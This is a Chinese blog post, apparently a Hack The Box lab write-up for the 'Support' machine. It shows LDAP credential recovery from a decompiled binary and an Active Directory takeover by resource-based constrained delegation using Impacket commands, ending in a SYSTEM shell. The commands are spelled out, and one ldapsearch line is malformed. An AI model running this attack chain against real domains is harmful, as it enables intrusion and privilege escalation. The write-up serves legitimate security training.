HTB-support

最新推荐文章于 2024-06-02 10:30:59 发布
最新推荐文章于 2024-06-02 10:30:59 发布
阅读量670 收藏 29
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/139128032
版权

获取普通用户

端口扫描

smbclient -L //[target] 枚举smb端口

尝试rpc匿名登入失败

看到了dc主机是dc.

dnspy打开共享文件夹的userinfo.exe

成功找到密码

找到了加密的密钥

{
Protected.enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E" ;
Protected.key = Encoding.ASCII.GetBytes( "armando" );
}

利用这段代码解密

public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}

解密密码:nvEfEK16^1aM4$e7AclUf8x$tRWxPW​​O1%lmz

但是用evil-winrm解密失败

因为上面说是ldap用户的试试枚举ldap

ldapsearch -x -H ldap://support.htb -D'support \ldap'- w'nvEfEK16 ^1aM4$e7AclUf8x$tRWxPW​​O1%lmz'- b'CN =Users,DC=support,DC=htb' | tee ldapsearch.log

成功登入

提权

上传sharphound,使用bloodhound

support用户是“SHARED SUPPORT ACCOUNTS@SUPPORT.HTB ”域组的成员,该域组对 DC 具有 GenericAll 权限。完全控制,此特权允许受托人随心所欲地操纵目标对象

基于资源的约束委派

如果攻击者不控制具有 SPN 设置的帐户,则可以使用 Impacket 的 addcomputer.py 示例脚本添加新的攻击者控制的计算机帐户

addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host
$DomainController -domain-netbios $DOMAIN 'domain/user:password'

参数中使用的变量 $DomainController$DOMAIN 在执行脚本之前应被替换为实际的域控制器地址和域名。

python3 addcomputer.py -computer-name 'evilcom$' -computer-pass password -dc-ip 10.10.11.174 support/support:Ironside47pleasure40Watchful

我们现在需要配置目标对象,以便攻击者控制的计算机可以委托给它。 Impacket 的 rbcd.py 脚本可用于此目的:

./rbcd.py -f EVILCOM -t DC -dc-ip 10.10.11.174 support\\support:Ironside47pleasure40Watchful

最后,我们可以获得我们想要“假装”为“admin”的服务名称(sname)的服务票证。

python3 getST.py -spn cifs/DC.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support/EVILCOM$:password

我们使用 Administrator.ccache 文件的路径更新 KRB5CCNAME 环境变量,并运行 klist 命令来验证服务票证是否已加载。我们将 DC 的 FQDN 添加到主机文件 (/etc/hosts) 中,并使用 impacket-psexec 和 Kerberos 身份验证来获取目标上的 SYSTEM shell。

export KRB5CCNAME=`pwd`/Administrator.ccache

python3 psexec.py -k DC.support.htb

文章在这

Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Notes

kikifofo
关注
  • 10
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB-Tier1
32bin的博客
11-16 1548
Task 1What does the acronym SQL stand for?********** ***** *******eStructured Query LanguageHide AnswerTask 2What is one of the most common type of SQL vulnerabilities?*** ********nsql injectionHide AnswerTask 3What does PII stand for?********** **********
htb-Intelligence
2201_75378806的博客
06-01 709
端口扫描smb无dig无ldap无枚举子域dnsenum将自动化其中大部分以及强力子域。它找到 dc.intelligence.htb,以及其他几个看起来像域控制器的文件:来到80页面,可以下载两个pdf文件exiftool 2020-01-01-upload.pdf查看一下爆破一下目录测试一下exif得到的pdf的用户是否有效尝试一下GetNPUsers.py -no-pass 失败。
HTB-Outdated
2201_75378806的博客
06-01 658
端口扫描smbclient -L查看共享文件有几个关于WSUS(Windows Server Update Services) 相关的共享(和WSUSTemp),Windows Server Update Services (WSUS) 是一个用于在整个网络中分发补丁的系统。在share目录下下载get NOC_Reminder.pdf内容:第一个暗示是他们正在寻找将 Web 应用程序链接发送到的人。这很有用,并表明有人会点击这些链接。
htb-BreadCrumbs
2201_75378806的博客
06-02 922
nmap端口扫描访问smb无果jwt令牌解密网站?>’主要知识点。
HTB-areo
2201_75378806的博客
06-01 684
端口扫描根据 IIS 版本,主机可能运行现代 Windows 操作系统(Window 10/11 或 Server 2016+)。访问80底下有一个上传自定义主题的表单尝试上传图片会失败,他需要.theme和.themepack扩展名制作一个虚拟文件test.theme并上传它该网站还表示将测试该主题,这意味着有人会打开它底部有一封电子邮件。页面上的所有链接都指向同一页面的其他部分。没有什么有用的进行目录爆破。
HTB-Querier
2201_75378806的博客
06-01 576
端口扫描smb枚举smbmap -u invaliduser -H 10.10.10.125 不行smbclient -N //10.10.10.125/Reports 可以,枚举这个目录下有一个.xlsm文件,提取出来'xx xx xx.xlsm' 与 xx\ xx\ xx.xlsm但像(olevba的一部分)这样的工具将为我提供 Linux 计算机上的 VBA记得查一下windows中office如何开启hong。
HTB-Tier2- Unified
32bin的博客
11-21 1356
WebVulnerability AssessmentDatabasesInjectionCustom ApplicationsOutdated SoftwareMongoDBJavaPenetration Tester Level 1ReconaisanceClear Text CredentialsDefault CredentialsCode InjectionSOFT RESETReset MachineOPENWalkthroughONNECTConnect to Starting Point V
# HTB-Tier2- Oopsie
32bin的博客
11-16 782
TagsPHPWebApacheOPENCONNECTONLINETask 1****yproxyTask 2//****nTask 3*****ecookieTask 4****234322Task 5/******s/uploadsTask 6**.**pdb.phpTask 7***dfindTask 8***trootTask 9Task 10cat尝试user=2233;
HTB-registry
qq_37027540的博客
03-04 1172
信息收集 使用nmap对靶机开放的服务进行探测nmap -A 10.10.10.159 -oA nmap -A -oA Registry 10.10.10.159 Nmap scan report for docker.registry.htb (10.10.10.159) Host is up (0.27s latency). Not shown: 997 closed ports PORT...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
HTB-Solutions
03-09
HTB-Solutions
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8293
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
汽车油量监测报警器 (一) 汽车的油箱油量检测通常是由水平检测器
06-18
汽车油量监测报警器 (一) 汽车的油箱油量检测通常是由水平检测器 (一个与仪表板油量计串接的由浮标控制的浮筒式电位器系统)来完成的
健康饮食-菜谱应用-健康食谱-生活方式-健康菜谱小程序-.zip
最新发布
06-18
本资源提供了一个名为“健康菜谱”的小程序开发指南和完整源码,该小程序专为提供健康食谱和营养信息而设计。用户可以通过这个平台了解各种健康美食的制作方法,包括低热量、高蛋白、素食等多种类型的菜品。 主要特点: 丰富的菜谱选择:提供各种健康食谱,包括早餐、午餐、晚餐以及零食等。 详细的营养信息:每个菜谱都配有详细的营养成分分析,帮助用户了解食物的健康价值。 易于操作的界面:界面简洁,用户可以轻松搜索和浏览不同的健康菜谱。 个性化推荐:根据用户的健康需求和饮食偏好提供个性化菜谱推荐。 技术实现: 前端技术:基于微信小程序平台,使用其API和组件库实现动态的用户界面和交互。 后端支持:使用云服务处理菜谱数据的存储、检索和更新。 数据分析:利用用户数据进行菜谱推荐,提高用户满意度和应用的互动性。 应用场景: 健康生活爱好者:适合关注健康饮食的用户,希望通过合理饮食改善健康。 健身人群:为健身者提供高蛋白等特定需求的食谱,支持他们的训练计划。 特殊饮食需求:支持有特殊饮食需求的用户,如糖尿病患者或素食者,提供符合需求的菜谱。
小程序版通过CNN卷积神经网络的服装识别-不含数据集图片-含逐行注释和说明文档.zip
06-18
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值